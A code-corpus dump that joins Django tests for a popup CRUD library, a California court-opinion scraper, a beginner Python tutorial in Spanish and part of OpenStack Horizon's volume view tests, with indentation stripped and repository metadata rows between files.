first_col = """<a name="object_detail" data-url="{0}" data-title="Author Detail" href="javascript:void(0);">{1}</a><div data-name=\'{1}\'></div>"""
self.assertContains(
response,
first_col.format(
reverse("author-detail", kwargs={'pk': author.pk}),
name)
)
self.assertContains(response, "<td>26</td>")
self.assertContains(response, "<td>13</td>") # Author.half_age
self.assertContains(response, "<td>52</td>") # AuthorCrudViewSet.double_age
# test half_age field header has sortable as it has 'order_field'
# attribute.
def test_get_obj_name(self):
# Also tests that unicode characters are rendered correctly
name = "何瑞理"
author = Author.objects.create(name=name, age=46)
response = self.client.get(reverse("authors"))
first_col = """<a name="object_detail" data-url="{0}" data-title="Author Detail" href="javascript:void(0);">{1}</a><div data-name=\'{1}\'></div>"""
self.assertContains(
response,
first_col.format(
reverse("author-detail", kwargs={'pk': author.pk}),
name)
)
# "<div data-name=\'Peter Parker - 46\'></div>")
def test_page_title(self):
author = Author.objects.create(name="John", age=26)
response = self.client.get(reverse("authors"))
self.assertEquals(response.context['page_title'], "Author List")
def test_empty_data(self):
response = self.client.get(reverse("authors"))
self.assertNotContains(response, "<table class='table")
self.assertNotContains(response, "<th>Name</th>")
self.assertNotContains(response, "<th>Age</th>")
self.assertContains(response, "No records found")
def test_object_access_through_pk_urls(self):
'''Test CRUDViewset view access using object.pk based urls'''
for _ in range(0, 10):
Author.objects.create(name="John", age=25)
response = self.client.get(reverse("authors"))
self.assertContains(response, "New Author")
self.assertContains(response, AuthorCrudViewset.new_url)
for obj in Author.objects.all():
self.assertContains(response, AuthorCrudViewset().get_edit_url(obj))
self.assertContains(response, AuthorCrudViewset().get_delete_url(obj))
self.assertContains(response, AuthorCrudViewset().get_detail_url(obj))
def test_object_access_through_slug_urls(self):
'''Test CRUDViewset view access using slug_field based urls'''
john = Author.objects.create(name='Peter', age=25)
for index in range(1, 10):
Book.objects.create(title='Title %d' % index, author=john)
response = self.client.get(reverse("uuidbooks:list"))
self.assertContains(response, BookUUIDCrudViewSet.new_url)
for obj in Book.objects.all():
self.assertContains(response, BookUUIDCrudViewSet().get_edit_url(obj))
self.assertContains(response, BookUUIDCrudViewSet().get_delete_url(obj))
self.assertContains(response, BookUUIDCrudViewSet().get_detail_url(obj))
def test_pagination(self):
for _ in range(0, 30):
Author.objects.create(name="John", age=25)
response = self.client.get(reverse("authors"))
po = response.context['page_obj']
self.assertEqual(po.number, 1)
self.assertTrue(po.has_next())
self.assertFalse(po.has_previous())
self.assertEqual(po.paginator.num_pages, 3)
def test_create_form_template(self):
# when requested through an AJAX, should only contain the <form></form>
url = reverse("new-author")
response = self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
match = re.search(RE_CREATE_EDIT_FORM.format(url),
response.content.decode('utf-8'), re.DOTALL)
self.assertEqual(match.pos, 0)
def test_update_form_template(self):
# when requested through an AJAX, should only contain the <form></form>
john = Author.objects.create(name="John", age=25)
url = reverse("edit-author", kwargs={'pk': john.pk})
response = self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
match = re.search(RE_CREATE_EDIT_FORM.format(url),
response.content.decode('utf-8'), re.DOTALL)
self.assertEqual(match.pos, 0)
def test_create(self):
url = reverse("new-author")
response = self.client.post(
url,
data={'name': 'John', 'age': 55},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
john = Author.objects.get(name='John', age=55)
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'name': 'John', 'pk': john.pk})
def test_update(self):
john = Author.objects.create(name="John", age=25)
url = reverse("edit-author", kwargs={'pk': john.pk})
response = self.client.post(
url,
data={'name': 'Peter', 'age': 35},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'name': 'Peter', 'pk': john.pk})
john.refresh_from_db()
self.assertEquals(john.name, 'Peter')
def test_detail(self):
john = Author.objects.create(name="John", age=25)
url = reverse("author-detail", kwargs={'pk': john.pk})
response = self.client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertTemplateUsed(response, "popupcrud/detail_inner.html")
self.assertContains(response, "John")
def test_legacy_crud_boolean(self):
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = True
response = self.client.get(reverse("authors"))
for pattern in MODAL_PATTERNS:
self.assertIsNone(
re.search(pattern, response.content.decode('utf-8')))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_crud_dict_create(self):
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'create': True
}
response = self.client.get(reverse("authors"))
# New Author button's href should be AuthorCrudViewset.new_url's value,
# and not 'javascript:void(0)'
NEW_BUTTON_RE = r'<a.*class="btn btn-primary".*href="%s.*">' % \
str(AuthorCrudViewset.new_url)
self.assertTrue(re.search(NEW_BUTTON_RE,
response.content.decode('utf-8'), re.DOTALL))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_crud_dict_create_n_update(self):
john = Author.objects.create(name="John", age=25)
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'create': True,
'update': True
}
response = self.client.get(reverse("authors"))
# create_edit_modal modal dialog should not exist
self.assertIsNone(
re.search(MODAL_PATTERNS[0], response.content.decode('utf-8')))
self.assertIsNone(
re.search(MODAL_PATTERNS[3], response.content.decode('utf-8')))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_crud_dict_detail(self):
name = "John"
john = Author.objects.create(name=name, age=25)
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'detail': True,
}
response = self.client.get(reverse("authors"))
# All the modal dialog's should be present, but Detail view should
# point to the detail url and not javascript:void(0)
for pattern in MODAL_PATTERNS:
self.assertIsNotNone(
re.search(pattern, response.content.decode('utf-8')))
# note href != "javascript:void(0)"
ITEM_DETAIL_RE = r'<a href="{0}".*>{1}</a>'.format(
reverse("author-detail", kwargs={'pk': john.pk}),
name)
self.assertIsNotNone(
re.search(ITEM_DETAIL_RE, response.content.decode('utf-8')))
AuthorCrudViewset.legacy_crud = prev_value
def test_legacy_create_contains_add_related_modal(self):
prev_value = AuthorCrudViewset.legacy_crud
AuthorCrudViewset.legacy_crud = {
'create': True
}
response = self.client.get(reverse("new-author"))
# modal id=add_related_modal pattern should exist in response
self.assertIsNotNone(
re.search(MODAL_PATTERNS[3], response.content.decode('utf-8')))
def test_viewset_urls(self):
# default arguments generates all views
urls = BookCrudViewset.urls()
for pattern in urls[0]:
self.assertTrue(pattern.name in ('list', 'create', 'detail', 'update', 'delete'))
# namespace defaults to model's verbose_name_plural
self.assertEqual(urls[2], 'books')
urls = BookCrudViewset.urls(views=('create', 'detail'))
for pattern in urls[0]:
self.assertTrue(pattern.name in ('list', 'create', 'detail'))
urls = BookCrudViewset.urls(views=('update', 'delete'))
for pattern in urls[0]:
self.assertTrue(pattern.name in ('list', 'update', 'delete'))
# test namespace argument
urls = BookCrudViewset.urls(namespace='titles')
self.assertEqual(urls[2], 'titles')
def test_viewset_urls(self):
# Integration test for urls(). Verify that the generated CRUD urls are
# registered in URLconf correctly.
name = "John"
john = Author.objects.create(name=name, age=25)
book = Book.objects.create(title='Title', author=john)
self.assertIsNotNone(reverse("books:list"))
self.assertIsNotNone(reverse("books:create"))
self.assertIsNotNone(reverse("books:detail", kwargs={'pk': book.pk}))
self.assertIsNotNone(reverse("books:update", kwargs={'pk': book.pk}))
self.assertIsNotNone(reverse("books:delete", kwargs={'pk': book.pk}))
def test_item_action_links(self):
"""
Tests that item custom action links are added to standard action
items for each row in the list.
"""
name = "John"
john = Author.objects.create(name=name, age=25)
peter = Author.objects.create(name="Peter", age=30)
book1 = Book.objects.create(title='Title 1', author=john)
book2 = Book.objects.create(title='Title 2', author=peter)
response = self.client.get(reverse("books:list"))
item_action = "<a name=\'custom_action\' href=\'javascript:void(0);\' title=\'{0}\' data-action=\'{1}\' data-obj=\'{2}\'><span class=\'{3}\'></span></a>"
for book in response.context['object_list']:
up_pattern = item_action.format(
"Up", "0", book1.pk, "glyphicon glyphicon-ok")
down_pattern = item_action.format(
"Down", "1", book2.pk, "glyphicon glyphicon-remove")
self.assertContains(response, up_pattern)
self.assertContains(response, down_pattern)
def test_item_action(self):
"""
Test that item custom action POST request results in a call to the
CrudViewSet method specified.
We cannot test JavaScript from unit test framework, but we can simulate
the relevant JS script behavior and run through the backend python code
for custom item actions.
"""
name = "John"
john = Author.objects.create(name=name, age=25)
book = Book.objects.create(title='Title 1', author=john)
response = self.client.post(reverse("books:list"), data={
'action': '0', 'item': book.pk})
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'result': True,
'message': "Up vote successful"})
response = self.client.post(reverse("books:list"), data={
'action': '1', 'item': book.pk})
result = json.loads(response.content.decode('utf-8'))
self.assertEquals(result, {'result': True,
'message': "Down vote successful"})
| bsd-3-clause | 748,750,833,190,306,800 | 43.894737 | 161 | 0.613337 | false |
brianwc/juriscraper | opinions/united_states/state/cal.py | 1 | 1498 | from juriscraper.OpinionSite import OpinionSite
import re
import time
from datetime import date
class Site(OpinionSite):
def __init__(self):
super(Site, self).__init__()
self.url = 'http://www.courtinfo.ca.gov/cgi-bin/opinions-blank.cgi?Courts=S'
self.court_id = self.__module__
def _get_case_names(self):
case_names = []
for name in self.html.xpath('//table/tr/td[3]/text()'):
date_regex = re.compile(r' \d\d?\/\d\d?\/\d\d| filed')
if 'P. v. ' in date_regex.split(name)[0]:
case_names.append(date_regex.split(name)[0].replace("P. ", "People "))
else:
case_names.append(date_regex.split(name)[0])
return case_names
def _get_download_urls(self):
return [t for t in self.html.xpath("//table/tr/td[2]/a/@href[contains(.,'PDF')]")]
def _get_case_dates(self):
dates = []
for s in self.html.xpath('//table/tr/td[1]/text()'):
s = s.strip()
date_formats = ['%b %d %Y', '%b %d, %Y']
for format in date_formats:
try:
dates.append(date.fromtimestamp(time.mktime(time.strptime(s, format))))
except ValueError:
pass
return dates
def _get_docket_numbers(self):
return [t for t in self.html.xpath('//table/tr/td[2]/text()[1]')]
def _get_precedential_statuses(self):
return ['Published'] * len(self.case_names)
| bsd-2-clause | 7,258,131,139,515,015,000 | 34.666667 | 91 | 0.548732 | false |
Jav10/Python | C-digosPython/VarTipo1.py | 1 | 1449 | #Variables y tipos de datos
#Autor: Javier Arturo Hernández Sosa
#Fecha: 28/Ago/2017
#Descripcion: Curso Python FES Acatlán
#Tipos de datos
numero = 5 #Operador de asignación
numero2 = 19
numeroFlotante = 25.0
cadena = "Hola Mundo"
boleano1 = True
boleano2 = False
complejo1 = 5 - 3j
complejo2 = 2 + 5j
#Operaciones Comunes +,-,/,//,%,*,**
print(numero+numeroFlotante)
print(numero-numero2)
print(19/5) #División Clásica regresa punto flotante
print(19//3) #División Entera omite fracción
print(19%5) #Operador Módulo regresa residuo
print(numero*numero2)
print(3**2) #Potencia 3 elevado a la 2
#Operaciones con cadenas
print(cadena*5)
print(cadena+cadena) #Concatenación
print(cadena+" "+"Continua")
#Booleanos
print(boleano1)
print(boleano2)
#Operadores lógicos
print(boleano1 & boleano2) #and
print(boleano1 & boleano1)
print(boleano1 | boleano2) #or
print(boleano2 | boleano2)
print(not boleano1)
print(boleano1 ^ boleano2) #xor verdadero si tienen valores diferentes, falso si son iguales
#Operadores de comparación
print(2==3)
print(6==6)
print("Hola"!="hola")
print("hola"<"dromedario")
print("hola">"zromedario")
print("Hormiga">="Hola")
print("Cono"<="Vaca")
#Conversion de tipos
#Para saber el tipo de datos type()
print(type("Oso"))
print(type(int(5.89)))
print(type(5.89))
print(type(str(567)))
#Esto es un error print(int("oso"))
#Complejos
print(complejo1 + complejo2)
| mit | 5,351,169,964,645,992,000 | 25.132075 | 92 | 0.716968 | false |
openstack/horizon | openstack_dashboard/dashboards/project/volumes/tests.py | 1 | 96001 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from django.conf import settings
from django.forms import widgets
from django.template.defaultfilters import slugify
from django.test.utils import override_settings
from django.urls import reverse
from django.utils.http import urlunquote
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
import tables as volume_tables
from openstack_dashboard.dashboards.project.volumes import tabs
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
DETAIL_URL = ('horizon:project:volumes:detail')
INDEX_URL = reverse('horizon:project:volumes:index')
SEARCH_OPTS = dict(status=api.cinder.VOLUME_STATE_AVAILABLE)
ATTACHMENT_ID = '6061364b-6612-48a9-8fee-1a38fe072547'
class VolumeIndexViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
api.cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits',
'group_list'],
})
def _test_index(self, with_attachments=False, with_groups=False):
vol_snaps = self.cinder_volume_snapshots.list()
volumes = self.cinder_volumes.list()
if with_attachments:
server = self.servers.first()
else:
for volume in volumes:
volume.attachments = []
self.mock_volume_backup_supported.return_value = False
if with_groups:
self.mock_group_list.return_value = self.cinder_groups.list()
volumes = self.cinder_group_volumes.list()
self.mock_volume_list_paged.return_value = [volumes, False, False]
if with_attachments:
self.mock_server_get.return_value = server
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(INDEX_URL)
if with_attachments:
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_snapshot_list.assert_called_once()
if with_groups:
self.mock_group_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_backup_supported.assert_called_with(
test.IsHttpRequest())
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None, search_opts=None,
sort_dir='desc', paginate=True)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
def test_index_with_volume_attachments(self):
self._test_index(True)
def test_index_no_volume_attachments(self):
self._test_index(False)
def test_index_with_volume_groups(self):
self._test_index(with_groups=True)
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
cinder: ['tenant_absolute_limits',
'volume_list_paged',
'volume_backup_supported',
'volume_snapshot_list'],
})
def _test_index_paginated(self, marker, sort_dir, volumes, url,
has_more, has_prev):
backup_supported = True
vol_snaps = self.cinder_volume_snapshots.list()
server = self.servers.first()
self.mock_volume_backup_supported.return_value = backup_supported
self.mock_volume_list_paged.return_value = [volumes,
has_more, has_prev]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(urlunquote(url))
self.assertEqual(2, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=marker, sort_dir=sort_dir,
search_opts=None, paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
return res
def ensure_attachments_exist(self, volumes):
volumes = copy.copy(volumes)
for volume in volumes:
if not volume.attachments:
volume.attachments.append({
"id": "1", "server_id": '1', "device": "/dev/hda",
"attachment_id": ATTACHMENT_ID})
return volumes
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# get first page
expected_volumes = volumes[:size]
url = INDEX_URL
res = self._test_index_paginated(None, "desc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get second page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get last page
expected_volumes = volumes[-size:]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
False, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated_prev_page(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# prev from some page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# back to first page
expected_volumes = volumes[:size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
class VolumeViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
def tearDown(self):
for volume in self.cinder_volumes.list():
# VolumeTableMixIn._set_volume_attributes mutates data
# and cinder_volumes.list() doesn't deep copy
for att in volume.attachments:
if 'instance' in att:
del att['instance']
super().tearDown()
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_without_name(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': '',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
cinder: ['volume_type_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'volume_snapshot_list',
'volume_snapshot_get',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_volume(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A copy of a volume',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
redirect_url = INDEX_URL
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], None, metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=volume.id)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
